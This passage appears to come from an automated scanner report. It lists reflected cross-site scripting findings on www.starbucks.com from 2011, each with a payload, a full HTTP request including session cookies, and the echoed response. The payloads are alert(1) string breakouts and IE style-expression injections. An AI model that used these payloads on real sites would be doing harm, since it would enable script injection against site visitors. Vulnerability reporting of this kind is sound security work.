The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26c27"%3balert(1)//b005536df9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 26c27";alert(1)//b005536df9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia?26c27"%3balert(1)//b005536df9f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:18:06 GMT
Connection: close
Content-Length: 40941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
= {};
       flashvars.playerType = "reserve";
       flashvars.playlistID = "679100977001";
       flashvars.playerLocation = "http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia?26c27";alert(1)//b005536df9f=1";
       var params = {};
       params.loop = "false";
       params.quality = "best";
       params.scale = "exactfit";
       params.wmode = "transparent";
       params.allowscriptaccess = "always";
       params.allownetw
...[SNIP]...

2.38. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/organic-blue-java

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51c23"%3balert(1)//aabb77efc8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 51c23";alert(1)//aabb77efc8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/starbucks-reserve-coffee/organic-blue-java?51c23"%3balert(1)//aabb77efc8a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:49 GMT
Connection: close
Content-Length: 40986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
flashvars = {};
       flashvars.playerType = "reserve";
       flashvars.playlistID = "731783176001";
       flashvars.playerLocation = "http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java?51c23";alert(1)//aabb77efc8a=1";
       var params = {};
       params.loop = "false";
       params.quality = "best";
       params.scale = "exactfit";
       params.wmode = "transparent";
       params.allowscriptaccess = "always";
       params.allownetw
...[SNIP]...

2.39. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/organic-blue-java

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2056f"style%3d"x%3aexpression(alert(1))"74970e702cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2056f"style="x:expression(alert(1))"74970e702cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee/organic-blue-java?2056f"style%3d"x%3aexpression(alert(1))"74970e702cd=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:48 GMT
Connection: close
Content-Length: 41081

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java?2056f"style="x:expression(alert(1))"74970e702cd=1" />
...[SNIP]...

2.40. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/organic-peru-tingo-maria

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62e73"style%3d"x%3aexpression(alert(1))"e0a45db438b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62e73"style="x:expression(alert(1))"e0a45db438b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee/organic-peru-tingo-maria?62e73"style%3d"x%3aexpression(alert(1))"e0a45db438b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:34 GMT
Connection: close
Content-Length: 40877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria?62e73"style="x:expression(alert(1))"e0a45db438b=1" />
...[SNIP]...

2.41. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/organic-peru-tingo-maria

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ac74"%3balert(1)//93e8ea141e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ac74";alert(1)//93e8ea141e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/starbucks-reserve-coffee/organic-peru-tingo-maria?5ac74"%3balert(1)//93e8ea141e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:37 GMT
Connection: close
Content-Length: 40777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
rs = {};
       flashvars.playerType = "reserve";
       flashvars.playlistID = "735248429001";
       flashvars.playerLocation = "http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria?5ac74";alert(1)//93e8ea141e=1";
       var params = {};
       params.loop = "false";
       params.quality = "best";
       params.scale = "exactfit";
       params.wmode = "transparent";
       params.allowscriptaccess = "always";
       params.allownetw
...[SNIP]...

2.42. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46d0d"style%3d"x%3aexpression(alert(1))"aec8401d6e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 46d0d"style="x:expression(alert(1))"aec8401d6e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/via?46d0d"style%3d"x%3aexpression(alert(1))"aec8401d6e5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:16:48 GMT
Connection: close
Content-Length: 50393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/via?46d0d"style="x:expression(alert(1))"aec8401d6e5=1" />
...[SNIP]...

2.43. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c836e"%3balert(1)//ea1e4924121 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c836e";alert(1)//ea1e4924121 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/via?c836e"%3balert(1)//ea1e4924121=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:16:54 GMT
Connection: close
Content-Length: 50298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
"text/javascript">
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "620273805001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee/via?c836e";alert(1)//ea1e4924121=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.44. http://www.starbucks.com/coffee/via/flavored-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via/flavored-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb780"style%3d"x%3aexpression(alert(1))"017ad330597 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb780"style="x:expression(alert(1))"017ad330597 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/via/flavored-coffee?bb780"style%3d"x%3aexpression(alert(1))"017ad330597=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:01 GMT
Connection: close
Content-Length: 50326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/via/flavored-coffee?bb780"style="x:expression(alert(1))"017ad330597=1" />
...[SNIP]...

2.45. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via/instant-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b90"style%3d"x%3aexpression(alert(1))"6c41d8ffcf1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47b90"style="x:expression(alert(1))"6c41d8ffcf1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/via/instant-coffee?47b90"style%3d"x%3aexpression(alert(1))"6c41d8ffcf1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:06 GMT
Connection: close
Content-Length: 50600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/via/instant-coffee?47b90"style="x:expression(alert(1))"6c41d8ffcf1=1" />
...[SNIP]...

2.46. http://www.starbucks.com/coffee/whole-bean-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70376"style%3d"x%3aexpression(alert(1))"4e8579796e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70376"style="x:expression(alert(1))"4e8579796e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee?70376"style%3d"x%3aexpression(alert(1))"4e8579796e6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:16:10 GMT
Connection: close
Content-Length: 50980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee?70376"style="x:expression(alert(1))"4e8579796e6=1" />
...[SNIP]...

2.47. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/africa-arabia

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4774c"style%3d"x%3aexpression(alert(1))"403ec5c4484 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4774c"style="x:expression(alert(1))"403ec5c4484 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/africa-arabia?4774c"style%3d"x%3aexpression(alert(1))"403ec5c4484=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:14:38 GMT
Connection: close
Content-Length: 42063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia?4774c"style="x:expression(alert(1))"403ec5c4484=1" />
...[SNIP]...

2.48. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/africa-arabia

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c4da"%3balert(1)//dbdcde42a66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2c4da";alert(1)//dbdcde42a66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/whole-bean-coffee/africa-arabia?2c4da"%3balert(1)//dbdcde42a66=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:14:41 GMT
Connection: close
Content-Length: 41968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "643101032001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia?2c4da";alert(1)//dbdcde42a66=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.49. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/asia-pacific

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f4f8"style%3d"x%3aexpression(alert(1))"3b6680e832f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f4f8"style="x:expression(alert(1))"3b6680e832f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/asia-pacific?6f4f8"style%3d"x%3aexpression(alert(1))"3b6680e832f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:14:47 GMT
Connection: close
Content-Length: 41482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific?6f4f8"style="x:expression(alert(1))"3b6680e832f=1" />
...[SNIP]...

2.50. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/asia-pacific

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60e4f"%3balert(1)//ccc1047f29b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 60e4f";alert(1)//ccc1047f29b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/whole-bean-coffee/asia-pacific?60e4f"%3balert(1)//ccc1047f29b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:14:53 GMT
Connection: close
Content-Length: 41387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
r flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "643064965001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific?60e4f";alert(1)//ccc1047f29b=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

